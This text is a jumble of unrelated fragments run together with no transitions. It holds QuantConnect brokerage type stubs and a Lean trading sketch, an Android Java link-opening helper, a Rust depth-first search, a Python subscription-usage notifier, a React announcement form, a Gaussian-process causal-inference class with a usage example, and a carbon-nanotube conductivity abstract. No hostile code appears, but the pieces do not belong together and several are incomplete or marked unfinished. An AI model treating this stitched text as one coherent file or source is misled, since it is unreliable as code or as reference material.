    def GetLeverage(self, security: QuantConnect.Securities.Security) -> float:
        pass

    def __init__(self, accountType: QuantConnect.AccountType) -> QuantConnect.Brokerages.BitfinexBrokerageModel:
        pass

    DefaultMarkets: System.Collections.Generic.IReadOnlyDictionary[QuantConnect.SecurityType, str]


class BrokerageFactoryAttribute(System.Attribute, System.Runtime.InteropServices._Attribute):
    """
    Represents the brokerage factory type required to load a data queue handler

    BrokerageFactoryAttribute(type: Type)
    """
    def __init__(self, type: type) -> QuantConnect.Brokerages.BrokerageFactoryAttribute:
        pass

    Type: type


class BrokerageMessageEvent(System.object):
    """
    Represents a message received from a brokerage

    BrokerageMessageEvent(type: BrokerageMessageType, code: int, message: str)
    BrokerageMessageEvent(type: BrokerageMessageType, code: str, message: str)
    """
    @staticmethod
    def Disconnected(message: str) -> QuantConnect.Brokerages.BrokerageMessageEvent:
        pass

    @staticmethod
    def Reconnected(message: str) -> QuantConnect.Brokerages.BrokerageMessageEvent:
        pass

    def ToString(self) -> str:
        pass

    @typing.overload
    def __init__(self, type: QuantConnect.Brokerages.BrokerageMessageType, code: int, message: str) -> QuantConnect.Brokerages.BrokerageMessageEvent:
        pass

    @typing.overload
    def __init__(self, type: QuantConnect.Brokerages.BrokerageMessageType, code: str, message: str) -> QuantConnect.Brokerages.BrokerageMessageEvent:
        pass

    def __init__(self, *args) -> QuantConnect.Brokerages.BrokerageMessageEvent:
        pass

    Code: str
    Message: str
    Type: QuantConnect.Brokerages.BrokerageMessageType


class BrokerageMessageType(System.Enum, System.IConvertible, System.IFormattable, System.IComparable):
    """
    Specifies the type of message received from an IBrokerage implementation

    enum BrokerageMessageType, values: Disconnect (4), Error (2), Information (0), Reconnect (3), Warning (1)
    """
    value__: int
    Disconnect: 'BrokerageMessageType'
    Error: 'BrokerageMessageType'
    Information: 'BrokerageMessageType'
    Reconnect: 'BrokerageMessageType'
    Warning: 'BrokerageMessageType'


class BrokerageModel(System.object):
    """
    Provides factory method for creating an QuantConnect.Brokerages.IBrokerageModel from the QuantConnect.Brokerages.BrokerageName enum
    """
    @staticmethod
    def Create(orderProvider: QuantConnect.Securities.IOrderProvider, brokerage: QuantConnect.Brokerages.BrokerageName, accountType: QuantConnect.AccountType) -> QuantConnect.Brokerages.IBrokerageModel:
        pass

    __all__: list


class BrokerageName(System.Enum, System.IConvertible, System.IFormattable, System.IComparable):
    """
    Specifies what transaction model and submit/execution rules to use

    enum BrokerageName, values: Alpaca (13), AlphaStreams (14), Bitfinex (5), Default (0), FxcmBrokerage (4), GDAX (12), InteractiveBrokersBrokerage (1), OandaBrokerage (3), QuantConnectBrokerage (0), TradierBrokerage (2)
    """
    value__: int
    Alpaca: 'BrokerageName'
    AlphaStreams: 'BrokerageName'
    Bitfinex: 'BrokerageName'
    Default: 'BrokerageName'
    FxcmBrokerage: 'BrokerageName'
    GDAX: 'BrokerageName'
    InteractiveBrokersBrokerage: 'BrokerageName'
    OandaBrokerage: 'BrokerageName'
    QuantConnectBrokerage: 'BrokerageName'
    TradierBrokerage: 'BrokerageName'


class DefaultBrokerageMessageHandler(System.object, QuantConnect.Brokerages.IBrokerageMessageHandler):
    """
    Provides a default implementation of QuantConnect.Brokerages.IBrokerageMessageHandler that will forward messages as follows:
    Information -> IResultHandler.Debug
    Warning -> IResultHandler.Error && IApi.SendUserEmail
    Error -> IResultHandler.Error && IAlgorithm.RunTimeError

    DefaultBrokerageMessageHandler(algorithm: IAlgorithm, job: AlgorithmNodePacket, api: IApi, initialDelay: Nullable[TimeSpan], openThreshold: Nullable[TimeSpan])
    """
    def Handle(self, message: QuantConnect.Brokerages.BrokerageMessageEvent) -> None:
        pass

    def __init__(self, algorithm: QuantConnect.Interfaces.IAlgorithm, job: QuantConnect.Packets.AlgorithmNodePacket, api: QuantConnect.Interfaces.IApi, initialDelay: typing.Optional[datetime.timedelta], openThreshold: typing.Optional[datetime.timedelta]) -> QuantConnect.Brokerages.DefaultBrokerageMessageHandler:
        pass
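# A minimal Lean algorithm sketch showing where the brokerage models stubbed
# above are actually selected. QCAlgorithm.SetBrokerageModel is part of Lean's
# public API; the dates, cash, and symbol below are arbitrary assumptions.
from QuantConnect import AccountType, Resolution
from QuantConnect.Brokerages import BrokerageName
from QuantConnect.Algorithm import QCAlgorithm


class BrokerageModelDemo(QCAlgorithm):
    def Initialize(self):
        self.SetStartDate(2019, 1, 1)
        self.SetCash(100000)
        # Picks the DefaultBrokerageModel-derived rules for fills, fees,
        # slippage, and order validation.
        self.SetBrokerageModel(BrokerageName.Default, AccountType.Margin)
        self.AddEquity("SPY", Resolution.Daily)

    def OnData(self, data):
        pass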
package com.macindex.macindex;

import android.app.AlertDialog;
import android.content.Context;
import android.net.Uri;
import android.view.LayoutInflater;
import android.view.View;
import android.widget.RadioButton;
import android.widget.RadioGroup;
import android.widget.Toast;

import androidx.browser.customtabs.CustomTabsIntent;
import androidx.core.content.ContextCompat;

class LinkLoadingHelper {

    public static void loadLinks(final String thisName, final String thisLinks, final Context thisContext) {
        try {
            if (thisLinks.equals("null")) {
                throw new IllegalArgumentException();
            }
            if (thisLinks.equals("N")) {
                Toast.makeText(thisContext,
                        MainActivity.getRes().getString(R.string.link_not_available), Toast.LENGTH_LONG).show();
                return;
            }
            final String[] linkGroup = thisLinks.split("html;");
            if (linkGroup.length == 1) {
                // Only one option, launch EveryMac directly.
                startBrowser(linkGroup[0].split(",http")[0],
                        "http" + linkGroup[0].split(",http")[1], thisContext);
            } else {
                // Fix ; and , split bug.
                for (int i = 0; i < linkGroup.length; i++) {
                    linkGroup[i] = linkGroup[i] + "html";
                }
                final AlertDialog.Builder linkDialog = new AlertDialog.Builder(thisContext);
                linkDialog.setTitle(thisName);
                linkDialog.setMessage(MainActivity.getRes().getString(R.string.link_message));
                // Setup each option in dialog.
                final View linkChunk = ((LayoutInflater) thisContext
                        .getSystemService(Context.LAYOUT_INFLATER_SERVICE)).inflate(R.layout.chunk_links, null);
                final RadioGroup linkOptions = linkChunk.findViewById(R.id.option);
                for (int i = 0; i < linkGroup.length; i++) {
                    final RadioButton linkOption = new RadioButton(thisContext);
                    linkOption.setText(linkGroup[i].split(",http")[0]);
                    linkOption.setId(i);
                    if (i == 0) {
                        linkOption.setChecked(true);
                    }
                    linkOptions.addView(linkOption);
                }
                linkDialog.setView(linkChunk);
                // When user tapped confirm or cancel...
                linkDialog.setPositiveButton(MainActivity.getRes().getString(R.string.link_confirm),
                        (dialog, which) -> {
                            try {
                                startBrowser(linkGroup[linkOptions.getCheckedRadioButtonId()]
                                                .split(",http")[0],
                                        "http" + linkGroup[linkOptions.getCheckedRadioButtonId()]
                                                .split(",http")[1], thisContext);
                            } catch (Exception e) {
                                ExceptionHelper.handleException(thisContext, e, null, null);
                            }
                        });
                linkDialog.setNegativeButton(MainActivity.getRes().getString(R.string.link_cancel),
                        (dialog, which) -> {
                            // Cancelled.
                        });
                linkDialog.show();
            }
        } catch (Exception e) {
            ExceptionHelper.handleException(thisContext, e, "loadLinks", "Link loading failed!!");
        }
    }

    public static void startBrowser(final String url, final Context thisContext) {
        try {
            CustomTabsIntent.Builder builder = new CustomTabsIntent.Builder();
            builder.setToolbarColor(ContextCompat.getColor(thisContext, R.color.colorPrimary));
            CustomTabsIntent customTabsIntent = builder.build();
            customTabsIntent.launchUrl(thisContext, Uri.parse(url));
        } catch (Exception e) {
            ExceptionHelper.handleException(thisContext, e, "startBrowserCustomTabs", "Failed to open " + url);
        }
    }

    public static void startBrowser(final String thisName, final String url, final Context thisContext) {
        startBrowser(url, thisContext);
        Toast.makeText(thisContext,
                MainActivity.getRes().getString(R.string.link_opening) + thisName, Toast.LENGTH_LONG).show();
    }
}
/// Returns a tuple of node id lists as the result of a depth-first search from node `start`.
/// The first list is the predecessor list, which maps each node to its predecessor in the
/// search path.
/// The second list is the order in which nodes are visited by the search algorithm.
///
/// # Arguments
/// * `network` - a borrowed value that implements the `Network` trait.
/// * `start` - a start node from where to search.
pub fn depth_first_search<N: Network>(network: &N, start: NodeId) -> (NodeVec, NodeVec) {
    let n = network.num_nodes();
    let mut stack = Stack::with_capacity(n);
    search(network, &mut stack, start)
}
def notify_usage(engine, lab_dict, sub_dict, upd_sub_list, timestamp_utc=None):
    success = True
    error = None
    count = 0

    session = session_open(engine)

    for _, sub_update in enumerate(upd_sub_list):
        send_notification = False
        new_details = sub_update[1]

        if new_details.subscription_status.lower() == CONST_SUB_CANCELLED.lower():
            continue

        notify, usage_code = _usage_notification(
            new_details.handout_budget, new_details.handout_consumed)

        if not notify:
            continue

        sub_latest_noti_code = (
            session.query(SubscriptionClass)
            .filter(SubscriptionClass.id == new_details.sub_id)
            .first()
            .usage_code
        )

        if sub_latest_noti_code is None:
            send_notification = True
        elif usage_code > sub_latest_noti_code:
            send_notification = True

        if send_notification:
            send_success, _ = _notify_usage_sub(
                session,
                lab_dict,
                sub_dict,
                new_details,
                usage_code,
                timestamp_utc=timestamp_utc,
            )
            if send_success:
                count += 1

    session_close(session)

    return success, error, count
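# The helper _usage_notification() is not shown above; this is only a plausible
# sketch of its contract, inferred from how notify_usage() uses it: return a
# (notify, usage_code) pair where usage_code grows with consumption, so that
# "usage_code > sub_latest_noti_code" means a new threshold was crossed. The
# 50/75/90/95% thresholds are assumptions, not the real values.
def _usage_notification_sketch(handout_budget, handout_consumed):
    thresholds = (50, 75, 90, 95)  # assumed notification levels, in percent
    if not handout_budget:
        return False, None
    used_pct = 100.0 * handout_consumed / handout_budget
    usage_code = None
    for code, threshold in enumerate(thresholds):
        if used_pct >= threshold:
            usage_code = code  # keep the highest threshold crossed
    return usage_code is not None, usage_code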
/* eslint-disable */
import * as React from "react";
import EditableInput from "./EditableInput";
import { Button } from "library-simplified-reusable-components";

export interface AnnouncementFormProps {
  content?: string;
  start?: string;
  finish?: string;
  id?: string;
  add: (announcement: any) => void;
}

export interface AnnouncementFormState {
  content?: string;
  start?: string;
  finish?: string;
  id?: string;
}

export default class AnnouncementForm extends React.Component<
  AnnouncementFormProps,
  AnnouncementFormState
> {
  constructor(props: AnnouncementFormProps) {
    super(props);
    this.updateStartDate = this.updateStartDate.bind(this);
    this.updateEndDate = this.updateEndDate.bind(this);
    let [start, finish] = this.getDefaultDates();
    this.state = {
      content: this.props.content || "",
      start: this.props.start || start,
      finish: this.props.finish || finish,
    };
  }

  getDefaultDates(): string[] {
    // By default, the start date is today's date and the end date is two months from today.
    let today = new Date();
    let start = this.formatDate(today);
    let finish = this.formatDate(
      new Date(today.setMonth(today.getMonth() + 2))
    );
    return [start, finish];
  }

  formatDate(date: Date | string): string {
    if (typeof date === "string" && date.indexOf("/") === -1) {
      return date;
    }
    let [month, day, year] =
      typeof date === "string"
        ? date.split("/")
        : date.toLocaleDateString("en-US").split("/");
    return `${year}-${month.toString().length === 1 ? "0" + month : month}-${
      day.toString().length === 1 ? "0" + day : day
    }`;
  }

  updateContent(content: string) {
    this.setState({ content });
  }

  updateStartDate(start: string) {
    this.setState({ start });
    // The first time you change the start date, the end date updates to be two months later.
    // Presumably, if the end date has already been changed away from the default, then it's
    // already where you want it, and it would just be annoying/confusing for it to keep
    // jumping around every time you change the start date.
    if (this.state.finish === this.getDefaultDates()[1]) {
      let startDate = new Date(start);
      let newMonth = startDate.getMonth() + 2;
      let finishDate = startDate.setMonth(newMonth);
      this.setState({ finish: this.formatDate(new Date(finishDate)) });
    }
  }

  updateEndDate(finish: string) {
    this.setState({ finish });
  }

  add(e: Event) {
    // Add the current announcement to the list of announcements in the parent component
    // (AnnouncementsSection).
    e.preventDefault();
    this.props.add({
      content: this.state.content,
      start: this.state.start,
      finish: this.state.finish,
      id: this.props.id || null,
    });
    // Restore the form to default dates and an empty content field.
    let [start, finish] = this.getDefaultDates();
    this.setState({ content: "", start: start, finish: finish });
  }

  cancel(e: Event) {
    e.preventDefault();
    // If an existing announcement was being edited, just put it back into the list.
    if (this.props.content) {
      this.add(e);
    } else {
      // Blank out the content field and restore the dates to their defaults.
      let [start, finish] = this.getDefaultDates();
      this.setState({ content: "", start: start, finish: finish });
    }
  }

  componentWillReceiveProps(newProps: AnnouncementFormProps) {
    // Switch from creating a new announcement to editing an existing one.
    if (newProps.content?.length > 0) {
      const { content, start, finish } = newProps;
      this.setState({
        content: content,
        start: this.formatDate(start),
        finish: this.formatDate(finish),
      });
    }
  }

  render(): JSX.Element {
    // None of the fields can be blank. Content must be between 15 and 350 characters
    // (inclusive, matching the minLength/maxLength bounds on the input below).
    let wrongLength =
      this.state.content.length < 15 || this.state.content.length > 350;
    let shouldDisable = () => {
      if (!this.state.content || !this.state.start || !this.state.finish) {
        return true;
      } else if (wrongLength) {
        return true;
      }
      return false;
    };
    return (
      <div className="announcement-form">
        <EditableInput
          className={wrongLength && "wrong-length"}
          elementType="textarea"
          type="text"
          minLength={15}
          maxLength={350}
          value={this.state.content}
          label="New Announcement Text (15-350 characters)"
          optionalText={false}
          onChange={(e) => this.updateContent(e)}
          description={`(Current length: ${this.state.content.length}/350)`}
        />
        <EditableInput
          type="date"
          max={this.state.finish}
          value={this.state.start}
          label="Start Date"
          optionalText={true}
          onChange={(e) => this.updateStartDate(e)}
          description="If no start date is chosen, the default start date is today's date."
        />
        <EditableInput
          type="date"
          min={this.state.start}
          value={this.state.finish}
          label="End Date"
          optionalText={true}
          onChange={(e) => this.updateEndDate(e)}
          description="If no expiration date is chosen, the default expiration date is 2 months from the start date."
        />
        <Button
          callback={(e: Event) => this.add(e)}
          className="inline left-align"
          disabled={shouldDisable()}
        />
        <Button
          callback={(e: Event) => this.cancel(e)}
          content="Cancel"
          className="inline left-align"
        />
      </div>
    );
  }
}
class CMGP:
    """
    An implementation of various Gaussian models for causal inference building on GPy.
    """

    # ----------------------------------------------------------------
    # This method implements the class constructor, automatically
    # invoked for every class instance
    # ----------------------------------------------------------------
    def __init__(self, mode="CMGP", **kwargs):
        """
        Class constructor.
        Initialize a GP object for causal inference.

        :mod: ['VirtualTwin'], ['Counterfactual'] or ['Multitask'], default is ['Multitask']
        :dim: the dimension of the input. Default is 1
        :kern: ['Matern'] or ['RBF'], default is the Radial Basis Kernel
        :mkern: for multitask models, can select from ICM and LCM models, default is ICM
        """
        # ** Set defaults **
        self.mod_list = ['VirtualTwin', 'Counterfactual', 'Multitask']
        self.kern_list = ['RBF', 'Matern']
        self.mkern_list = ['ICM', 'LCM']
        self.mod = self.mod_list[2]
        self.dim = 1
        self.kern = self.kern_list[0]
        self.mkern = self.mkern_list[0]
        self.mode = mode
        self.Bayesian = True
        self.Confidence = True

        # ** Read input arguments **
        if kwargs.__contains__('mod'):
            self.mod = kwargs['mod']
        if kwargs.__contains__('dim'):
            self.dim = kwargs['dim']
        if kwargs.__contains__('kern'):
            self.kern = kwargs['kern']
        if (kwargs.__contains__('mkern')) and (self.mod == self.mod_list[2]):
            self.mkern = kwargs['mkern']

        # ** Catch exceptions: handle wrong inputs **
        try:
            if (self.dim < 1) or (type(self.dim) != int):
                raise ValueError('Invalid value for the input dimension! Input dimension has to be a positive integer.')
            if (self.mod not in self.mod_list) or (self.kern not in self.kern_list) or (self.mkern not in self.mkern_list):
                raise ValueError('Invalid input!')
            if (kwargs.__contains__('mkern')) and (self.mod != 'Multitask'):
                raise ValueError('Invalid input! Multitask kernels are valid only for the Multitask mode')
        except ValueError:
            if self.mod not in self.mod_list:
                raise ValueError('Invalid input: The provided mode is undefined for class GaussianProcess_Model.')
            elif self.kern not in self.kern_list:
                raise ValueError('Invalid input: The provided kernel is undefined for class GaussianProcess_Model.')
            elif self.mkern not in self.mkern_list:
                raise ValueError('Invalid input: The provided Multitask kernel is undefined for class GaussianProcess_Model.')
            else:
                raise ValueError('Invalid input for GaussianProcess_Model!')
        else:
            # Initialize the kernels and likelihoods depending on the specified model
            if self.mod == self.mod_list[0]:
                del self.mkern
                if self.kern == self.kern_list[0]:
                    self.ker0 = GPy.kern.RBF(input_dim=self.dim, ARD=True)
                    self.ker1 = GPy.kern.RBF(input_dim=self.dim, ARD=True)
                else:
                    self.ker0 = GPy.kern.Matern32(input_dim=self.dim, ARD=True)
                    self.ker1 = GPy.kern.Matern32(input_dim=self.dim, ARD=True)
                self.lik0 = GPy.likelihoods.Gaussian()
                self.lik1 = GPy.likelihoods.Gaussian()
            elif self.mod == self.mod_list[1]:
                del self.mkern
                if self.kern == self.kern_list[0]:
                    self.ker = GPy.kern.RBF(input_dim=self.dim + 1, ARD=True)
                else:
                    self.ker = GPy.kern.Matern32(input_dim=self.dim + 1, ARD=True)
                self.lik = GPy.likelihoods.Gaussian()
            elif self.mod == self.mod_list[2]:
                # edit this later
                if self.kern == self.kern_list[0]:
                    base_kernel = GPy.kern.RBF(input_dim=self.dim, ARD=True)
                    self.ker = GPy.util.multioutput.ICM(self.dim, 2, base_kernel, W_rank=1, W=None, kappa=None, name='ICM')
                else:
                    self.ker = GPy.kern.Matern32(input_dim=self.dim)
                self.lik = GPy.likelihoods.Gaussian()

    # -----------------------------------------------------------------------------------------------------------
    # This method optimizes the model hyperparameters using the factual samples for the treated and control arms.
    # ** Note ** all inputs to this method are positional arguments.
    # -----------------------------------------------------------------------------------------------------------
    def fit(self, X, Y, W):
        """
        Optimizes the model hyperparameters using the factual samples for the treated and control arms.
        X has to be an N x dim matrix.

        :X: The input covariates
        :Y: The corresponding outcomes
        :W: The treatment assignments
        """
        # Situate the data in a pandas data frame
        Dataset = pd.DataFrame(X)
        Dataset['Y'] = Y
        Dataset['W'] = W

        Xshape = np.array(X).shape
        Yshape = np.array(Y).shape
        W_comp = Dataset.loc[Dataset['W'] != 1, 'W']
        self.X_train = np.array(X)

        if self.dim > 1:
            Feature_names = list(range(self.dim))
        else:
            Feature_names = 0

        # Input validation kept disabled, as in the original:
        # try:
        #     if (Xshape[1] != self.dim) or (Yshape[1] != 1) or (Xshape[0] != Yshape[0]) or (len(W_comp) > 0):
        #         raise ValueError('Invalid Inputs!')
        # except ValueError:
        #     if (Xshape[1] != self.dim):
        #         raise ValueError('Invalid input: Dimension of input covariates do not match the model dimensions')
        #     elif (Yshape[1] != 1):
        #         raise ValueError('Invalid input: Outcomes must be formatted in a 1D vector.')
        #     elif (Xshape[0] != Yshape[0]):
        #         raise ValueError('Invalid input: Outcomes and covariates do not have the same number of samples.')
        #     elif (len(W_comp) > 0):
        #         raise ValueError('Invalid input: Treatment assignment vector has non-binary values.')

        if self.mod == self.mod_list[0]:
            Dataset0 = Dataset[Dataset['W'] == 0].copy()
            Dataset1 = Dataset[Dataset['W'] == 1].copy()

            # Extract data for the first model
            X0 = np.reshape(np.array(Dataset0[Feature_names].copy()), (len(Dataset0), self.dim))
            y0 = np.reshape(np.array(Dataset0['Y'].copy()), (len(Dataset0), 1))

            # Extract data for the second model
            X1 = np.reshape(np.array(Dataset1[Feature_names].copy()), (len(Dataset1), self.dim))
            y1 = np.reshape(np.array(Dataset1['Y'].copy()), (len(Dataset1), 1))

            self.model = [GPy.core.GP(X0, y0, kernel=self.ker0, likelihood=self.lik0),
                          GPy.core.GP(X1, y1, kernel=self.ker1, likelihood=self.lik1)]
            self.model[0].optimize(messages=False, max_f_eval=1000)
            self.model[1].optimize(messages=False, max_f_eval=1000)

        elif self.mod == self.mod_list[1]:
            # X = np.array(Dataset[[Feature_names, 'W']])
            X = np.array(Dataset[Feature_names + ['W']])
            y = np.reshape(np.array(Dataset['Y']), (len(np.array(Dataset['Y'])), 1))
            self.model = GPy.core.GP(X, y, kernel=self.ker, likelihood=self.lik)
            self.model.optimize(messages=False, max_f_eval=1000)

        elif self.mod == self.mod_list[2]:
            Dataset0 = Dataset[Dataset['W'] == 0].copy()
            Dataset1 = Dataset[Dataset['W'] == 1].copy()

            # Extract data for the first learning task (control population)
            X0 = np.reshape(Dataset0[Feature_names].copy(), (len(Dataset0), self.dim))
            y0 = np.reshape(np.array(Dataset0['Y'].copy()), (len(Dataset0), 1))

            # Extract data for the second learning task (treated population)
            X1 = np.reshape(Dataset1[Feature_names].copy(), (len(Dataset1), self.dim))
            y1 = np.reshape(np.array(Dataset1['Y'].copy()), (len(Dataset1), 1))

            # Create an instance of a GPy coregionalization model.
            # Alternative base kernels tried during development:
            # K0 = GPy.kern.Matern32(self.dim, ARD=True)
            # K1 = GPy.kern.Matern32(self.dim)
            # K0 = GPy.kern.MLP(self.dim, ARD=True)
            # K1 = GPy.kern.MLP(self.dim, ARD=True)
            # K0 = GPy.kern.Spline(input_dim=self.dim)
            # K1 = GPy.kern.Spline(input_dim=self.dim)
            K0 = GPy.kern.RBF(self.dim, ARD=True)
            K1 = GPy.kern.RBF(self.dim, ARD=True)

            kernel_dict = {"CMGP": GPy.util.multioutput.LCM(input_dim=self.dim, num_outputs=2, kernels_list=[K0, K1]),
                           "NSGP": GPy.util.multioutput.ICM(input_dim=self.dim, num_outputs=2, kernel=K0)}

            # self.model = risk_based_empirical_bayes_GP(X_list=[X0, X1], Y_list=[y0, y1], W=W,
            #                                            kernel=kernel_dict[self.mode])
            self.model = GPy.models.GPCoregionalizedRegression(X_list=[X0, X1],
                                                               Y_list=[y0, y1],
                                                               kernel=kernel_dict[self.mode])
            # self.initialize_hyperparameters(X, Y, W)

            try:
                self.model.optimize('bfgs', max_iters=500)
            except np.linalg.LinAlgError as err:
                print("Covariance matrix not invertible.")

    # -----------------------------------------------------------------------------------------------------------
    # This method infers the treatment effect for a certain set of input covariates.
    # ** Note ** all inputs to this method are positional arguments.
    # It returns the predicted ITE and posterior variance but does not store them in self.
    # -----------------------------------------------------------------------------------------------------------
    def predict(self, X):
        """
        Infers the treatment effect for a certain set of input covariates.
        Returns the predicted ITE and posterior variance.

        :X: The input covariates at which the outcomes need to be predicted
        """
        # Get input size
        Xshape = np.array(X).shape

        if self.mod == self.mod_list[0]:
            Y_est_0, var_0 = self.model[0].predict(X)
            Y_est_1, var_1 = self.model[1].predict(X)
            TE_est = Y_est_1 - Y_est_0
            var_all = var_0 + var_1
        elif self.mod == self.mod_list[1]:
            W0 = np.reshape([0] * Xshape[0], (Xshape[0], 1))
            W1 = np.reshape([1] * Xshape[0], (Xshape[0], 1))
            X_new_0 = np.hstack((np.reshape(np.array(X), (Xshape[0], self.dim)), W0))
            X_new_1 = np.hstack((np.reshape(np.array(X), (Xshape[0], self.dim)), W1))
            Y_est_0, var_0 = self.model.predict(X_new_0)
            Y_est_1, var_1 = self.model.predict(X_new_1)
            TE_est = Y_est_1 - Y_est_0
            var_all = var_0 + var_1  # correct this
        elif self.mod == self.mod_list[2]:
            if self.dim == 1:
                X_ = X[:, None]
                X_0 = np.hstack([X_, np.reshape(np.array([0] * len(X)), (len(X), 1))])
                X_1 = np.hstack([X_, np.reshape(np.array([1] * len(X)), (len(X), 1))])
                noise_dict_0 = {'output_index': X_0[:, 1:].astype(int)}
                noise_dict_1 = {'output_index': X_1[:, 1:].astype(int)}
                Y_est_0 = self.model.predict(X_0, Y_metadata=noise_dict_0)[0]
                Y_est_1 = self.model.predict(X_1, Y_metadata=noise_dict_1)[0]
            else:
                X_0 = np.array(np.hstack([X, np.zeros_like(X[:, 1].reshape((len(X[:, 1]), 1)))]))
                X_1 = np.array(np.hstack([X, np.ones_like(X[:, 1].reshape((len(X[:, 1]), 1)))]))
                X_0_shape = X_0.shape
                X_1_shape = X_1.shape
                noise_dict_0 = {'output_index': X_0[:, X_0_shape[1] - 1].reshape((X_0_shape[0], 1)).astype(int)}
                noise_dict_1 = {'output_index': X_1[:, X_1_shape[1] - 1].reshape((X_1_shape[0], 1)).astype(int)}
                Y_est_0 = np.array(list(self.model.predict(X_0, Y_metadata=noise_dict_0)[0]))
                Y_est_1 = np.array(list(self.model.predict(X_1, Y_metadata=noise_dict_1)[0]))
            _, var_0 = self.model.predict(X_0, Y_metadata=noise_dict_0)
            _, var_1 = self.model.predict(X_1, Y_metadata=noise_dict_1)
            TE_est = Y_est_1 - Y_est_0
            var_all = var_0 + var_1

        return TE_est, Y_est_0, Y_est_1, var_all

    # -----------------------------------------------------------------------------------------------------------
    # This method initializes the model's hyper-parameters before passing to the optimizer.
    # Currently working only for the multi-task model.
    # -----------------------------------------------------------------------------------------------------------
    def initialize_hyperparameters(self, X, Y, W):
        """
        Initializes the multi-tasking model's hyper-parameters before passing to the optimizer.

        :X: The input covariates
        :Y: The corresponding outcomes
        :W: The treatment assignments
        """
        # -----------------------------------------------------------------------------------
        # Output parameters:
        # :Ls0, Ls1: length scale vectors for treated and control, dimensions match self.dim
        # :s0, s1: noise variances for the two kernels
        # :a0, a1: diagonal elements of the correlation matrices
        # :b0, b1: off-diagonal elements of the correlation matrices
        # -----------------------------------------------------------------------------------
        Dataset = pd.DataFrame(X)
        Dataset['Y'] = Y
        Dataset['W'] = W

        Xshape = np.array(X).shape
        Yshape = np.array(Y).shape

        if self.dim > 1:
            Feature_names = list(range(self.dim))
        else:
            Feature_names = 0

        if self.mod == self.mod_list[2]:
            Dataset0 = Dataset[Dataset['W'] == 0]
            Dataset1 = Dataset[Dataset['W'] == 1]

            neigh0 = KNeighborsRegressor(n_neighbors=10)
            neigh1 = KNeighborsRegressor(n_neighbors=10)
            neigh0.fit(Dataset0[Feature_names], Dataset0['Y'])
            neigh1.fit(Dataset1[Feature_names], Dataset1['Y'])

            Dataset['Yk0'] = neigh0.predict(Dataset[Feature_names])
            Dataset['Yk1'] = neigh1.predict(Dataset[Feature_names])
            Dataset0['Yk0'] = Dataset.loc[Dataset['W'] == 0, 'Yk0']
            Dataset0['Yk1'] = Dataset.loc[Dataset['W'] == 0, 'Yk1']
            Dataset1['Yk0'] = Dataset.loc[Dataset['W'] == 1, 'Yk0']
            Dataset1['Yk1'] = Dataset.loc[Dataset['W'] == 1, 'Yk1']

            a0 = np.sqrt(np.mean((Dataset0['Y'] - np.mean(Dataset0['Y'])) ** 2))
            a1 = np.sqrt(np.mean((Dataset1['Y'] - np.mean(Dataset1['Y'])) ** 2))
            b0 = np.mean((Dataset['Yk0'] - np.mean(Dataset['Yk0'])) * (Dataset['Yk1'] - np.mean(Dataset['Yk1']))) / (a0 * a1)
            b1 = b0
            s0 = np.sqrt(np.mean((Dataset0['Y'] - Dataset0['Yk0']) ** 2)) / a0
            s1 = np.sqrt(np.mean((Dataset1['Y'] - Dataset1['Yk1']) ** 2)) / a1

            self.model.sum.ICM0.rbf.lengthscale = 10 * np.ones(self.dim)
            self.model.sum.ICM1.rbf.lengthscale = 10 * np.ones(self.dim)
            self.model.sum.ICM0.rbf.variance = 1
            self.model.sum.ICM1.rbf.variance = 1
            self.model.sum.ICM0.B.W[0] = b0
            self.model.sum.ICM0.B.W[1] = b0
            self.model.sum.ICM1.B.W[0] = b1
            self.model.sum.ICM1.B.W[1] = b1
            self.model.sum.ICM0.B.kappa[0] = a0 ** 2
            self.model.sum.ICM0.B.kappa[1] = 1e-4
            self.model.sum.ICM1.B.kappa[0] = 1e-4
            self.model.sum.ICM1.B.kappa[1] = a1 ** 2
            self.model.mixed_noise.Gaussian_noise_0.variance = s0 ** 2
            self.model.mixed_noise.Gaussian_noise_1.variance = s1 ** 2
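# A minimal end-to-end sketch for the CMGP class above, on synthetic data.
# The data-generating process is an assumption (random covariates, a constant
# treatment effect of +1, Gaussian noise); only the CMGP calls mirror the
# class's own fit()/predict() API, and GPy, numpy and pandas are assumed to be
# importable as in the module above.
import numpy as np

n, d = 200, 3
rng = np.random.RandomState(0)
X = rng.randn(n, d)
W = rng.binomial(1, 0.5, size=n)
Y = X[:, 0] + W * 1.0 + 0.1 * rng.randn(n)

model = CMGP(mode="CMGP", mod="Multitask", dim=d, kern="RBF")
model.fit(X, Y, W)

X_test = rng.randn(20, d)
TE_est, Y0_est, Y1_est, var_all = model.predict(X_test)
print(TE_est.mean())  # should be close to the true effect of 1.0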
Molecular modeling of the conductivity of carbon nanotubes under different temperature and humidity Sensors are now widely used and come in many varieties, such as biological sensors, gas sensors, humidity sensors, optical sensors, and pressure sensors. However, the performance of many sensors still needs optimization. For instance, biosensors are limited by biofilm activity, detection range, and sensor lifetime, while gas sensors commonly suffer from hysteresis and degradation. In humidity sensors, humidity is difficult to measure accurately because of the strong influence of atmospheric pressure and temperature. With the emergence of CNT-based sensors, these problems may be solved. Owing to the excellent properties of CNTs, such as enhanced electron transfer, a large edge-plane/basal-plane ratio, and high electrical conductivity, CNT-based sensors offer higher sensitivity, lower detection limits, and faster electron-transfer kinetics than traditional ones. In addition, a CNT film has a very large specific surface area and interacts strongly with the surrounding medium; it is therefore highly sensitive to ambient humidity and shows pronounced humidity-sensing characteristics. Because CNT sensors operate in varied environments, studying the conductivity of CNTs at different temperatures is of great significance. A molecular modeling approach was therefore adopted to analyze the conductivity of different CNT types, such as (9, 9) and (9, 0) CNTs, within the sensor operating-temperature range (−20 °C to 100 °C) and under different humidity conditions. It was found that the forbidden gaps of (9, 9) and (9, 0) CNTs generally decrease with increasing temperature. The conductivity of CNTs under different moisture conditions was also analyzed; the forbidden gap of the CNTs changed little after the tubes were filled with pure water molecules. This study provides a rational way of using molecular modeling to evaluate and design CNTs for various applications such as biosensors and chemical sensors.
